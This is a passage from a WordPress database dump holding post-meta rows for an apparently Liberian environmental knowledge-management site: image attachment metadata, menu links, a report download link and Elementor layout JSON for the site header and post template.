";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30476,3107,'_wp_page_template','default'),(30477,3107,'_pods_document_cover_image','a:1:{i:0;i:4265;}'),(30478,3107,'document_cover_image','4265'),(30479,3107,'attached_document','3108'),(30480,3097,'_last_editor_used_jetpack','classic-editor'),(30481,4267,'_wp_attached_file','2020/06/WCF-annual-report.png'),(30482,4267,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:29:\"2020/06/WCF-annual-report.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"WCF-annual-report-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"WCF-annual-report-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"WCF-annual-report-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:28:\"WCF-annual-report-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:29:\"WCF-annual-report-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:29:\"WCF-annual-report-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30483,3097,'_wp_page_template','default'),(30484,3097,'_pods_document_cover_image','a:1:{i:0;i:4267;}'),(30487,3097,'document_cover_image','4267'),(30488,3097,'attached_document','3098'),(30489,3092,'_last_editor_used_jetpack','classic-editor'),(30490,4269,'_wp_attached_file','2020/06/wcf-1.png'),(30491,4269,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:17:\"2020/06/wcf-1.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"wcf-1-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"wcf-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"wcf-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"wcf-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"wcf-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"wcf-1-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30492,3092,'_wp_page_template','default'),(30493,3092,'_pods_document_cover_image','a:1:{i:0;i:4269;}'),(30494,3092,'document_cover_image','4269'),(30495,3092,'attached_document','3095'),(30501,4275,'_edit_lock','1630697833:42'),(30502,4275,'_last_editor_used_jetpack','block-editor'),(30503,4276,'_wp_attached_file','2021/09/omega-market.png'),(30504,4276,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:24:\"2021/09/omega-market.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"omega-market-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"omega-market-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"omega-market-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"omega-market-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:23:\"omega-market-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:24:\"omega-market-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:24:\"omega-market-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:24:\"omega-market-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:24:\"omega-market-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:24:\"omega-market-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:24:\"omega-market-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30507,4275,'_wp_old_date','2021-09-03'),(30508,4275,'_thumbnail_id','4276'),(30509,4275,'_edit_last','42'),(30512,4275,'kava_extra_enable_breadcrumbs','inherit'),(30513,4275,'post_formats',''),(30514,4275,'gallery_tab',''),(30515,4275,'kava_extra_gallery_images',''),(30516,4275,'link_tab',''),(30517,4275,'kava_extra_link',''),(30518,4275,'kava_extra_link_target','_blank'),(30519,4275,'quote_tab',''),(30520,4275,'kava_extra_quote_text',''),(30521,4275,'kava_extra_quote_cite',''),(30522,4275,'audio_tab',''),(30523,4275,'kava_extra_audio',''),(30524,4275,'kava_extra_audio_loop','false'),(30525,4275,'kava_extra_audio_autoplay','false'),(30526,4275,'kava_extra_audio_preload','false'),(30527,4275,'video_tab',''),(30528,4275,'kava_extra_video_type','library'),(30529,4275,'kava_extra_video_library',''),(30530,4275,'kava_extra_video_external',''),(30531,4275,'kava_extra_video_poster',''),(30532,4275,'kava_extra_video_width','770'),(30533,4275,'kava_extra_video_height','480'),(30534,4275,'kava_extra_video_loop','false'),(30535,4275,'kava_extra_video_autoplay','false'),(30536,4275,'kava_extra_video_preload','false'),(30546,4238,'_wp_page_template','default'),(30547,4238,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/SOER-Final-Report-Liberia-@-February-4-2021-PRINT.pdf'),(30548,4238,'by','EPA'),(30549,4238,'year','2021'),(30550,3257,'_wp_page_template','default'),(30551,3257,'_pods_document_cover_image','a:1:{i:0;i:3561;}'),(30552,3257,'document_cover_image','3561'),(30553,3257,'attached_document','3258'),(30568,4282,'_menu_item_type','custom'),(30569,4282,'_menu_item_menu_item_parent','0'),(30570,4282,'_menu_item_object_id','4282'),(30571,4282,'_menu_item_object','custom'),(30572,4282,'_menu_item_target','_blank'),(30573,4282,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30574,4282,'_menu_item_xfn',''),(30575,4282,'_menu_item_url','https://liberiaprojects.org'),(30577,2078,'_wp_old_date','2021-08-19'),(30578,2081,'_wp_old_date','2021-08-19'),(30579,2080,'_wp_old_date','2021-08-19'),(30580,2079,'_wp_old_date','2021-08-19'),(30581,2082,'_wp_old_date','2021-08-19'),(30582,2702,'_wp_old_date','2021-08-19'),(30583,4283,'_menu_item_type','custom'),(30584,4283,'_menu_item_menu_item_parent','0'),(30585,4283,'_menu_item_object_id','4283'),(30586,4283,'_menu_item_object','custom'),(30587,4283,'_menu_item_target','_blank'),(30588,4283,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30589,4283,'_menu_item_xfn',''),(30590,4283,'_menu_item_url','http://www.iiu-mpw.org'),(30592,1594,'institution_logo','2234'),(30593,1584,'institution_logo','4004'),(30594,4284,'_menu_item_type','custom'),(30595,4284,'_menu_item_menu_item_parent','0'),(30596,4284,'_menu_item_object_id','4284'),(30597,4284,'_menu_item_object','custom'),(30598,4284,'_menu_item_target','_blank'),(30599,4284,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30600,4284,'_menu_item_xfn',''),(30601,4284,'_menu_item_url','https://liberia.enterprise.earthnetworks.com'),(30614,4286,'_elementor_edit_mode','builder'),(30615,4286,'_elementor_template_type','header'),(30616,4286,'_elementor_version','3.4.0'),(30617,4286,'_elementor_pro_version','3.3.6'),(30618,4286,'_wp_page_template','default'),(30619,4286,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}],\"z_index\":10},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.077999999999999403144101961515843868255615234375},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":56.8509999999999990905052982270717620849609375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":20.995999999999998664179656771011650562286376953125,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f28ff03\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":9.047000000000000596855898038484156131744384765625},\"elements\":[{\"id\":\"aed2366\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":86.921999999999997044142219237983226776123046875},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"f95713d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":13.0210000000000007958078640513122081756591796875,\"content_position\":\"center\",\"text_align\":\"center\"},\"elements\":[{\"id\":\"3c1f6ee\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[gtranslate]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30621,4286,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(30622,3800,'_elementor_controls_usage','a:8:{s:5:\"image\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:3:{s:5:\"image\";i:2;s:7:\"link_to\";i:1;s:4:\"link\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:4:{s:12:\"_inline_size\";i:7;s:16:\"content_position\";i:2;s:5:\"align\";i:1;s:21:\"space_between_widgets\";i:1;}}s:5:\"style\";a:1:{s:12:\"section_typo\";a:1:{s:10:\"text_align\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:5:\"align\";i:1;s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:4:{s:4:\"text\";i:1;s:5:\"align\";i:1;s:4:\"size\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:5:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:16:\"background_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:14:\"section_layout\";a:3:{s:16:\"content_position\";i:2;s:3:\"gap\";i:2;s:6:\"layout\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:6:\"margin\";i:1;s:7:\"z_index\";i:2;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;}}}}s:8:\"nav-menu\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:3:{s:4:\"menu\";i:1;s:11:\"align_items\";i:1;s:7:\"pointer\";i:1;}}s:5:\"style\";a:2:{s:23:\"section_style_main-menu\";a:7:{s:26:\"menu_typography_typography\";i:1;s:27:\"menu_typography_font_family\";i:1;s:25:\"menu_typography_font_size\";i:1;s:27:\"menu_typography_font_weight\";i:1;s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:29:\"pointer_color_menu_item_hover\";i:1;}s:22:\"section_style_dropdown\";a:3:{s:19:\"color_dropdown_item\";i:1;s:25:\"color_dropdown_item_hover\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;}}s:8:\"advanced\";a:1:{s:18:\"section_custom_css\";a:1:{s:10:\"custom_css\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(30636,4288,'_elementor_edit_mode','builder'),(30637,4288,'_elementor_template_type','single-post'),(30638,4288,'_elementor_version','3.4.0'),(30639,4288,'_elementor_pro_version','3.3.6'),(30640,4288,'_wp_page_template','default'),(30641,4288,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"bcc8fe1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"9e89f61\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date modified:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"3d1d791\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"e0ed79b\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}},{\"type\":\"comments\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"803e164\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\"}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"text_color\":\"#02010154\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"16bb1bf\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"e7009c1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"__dynamic__\":{\"custom_url\":\"[elementor-tag id=\\\"5668872\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"}}]},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"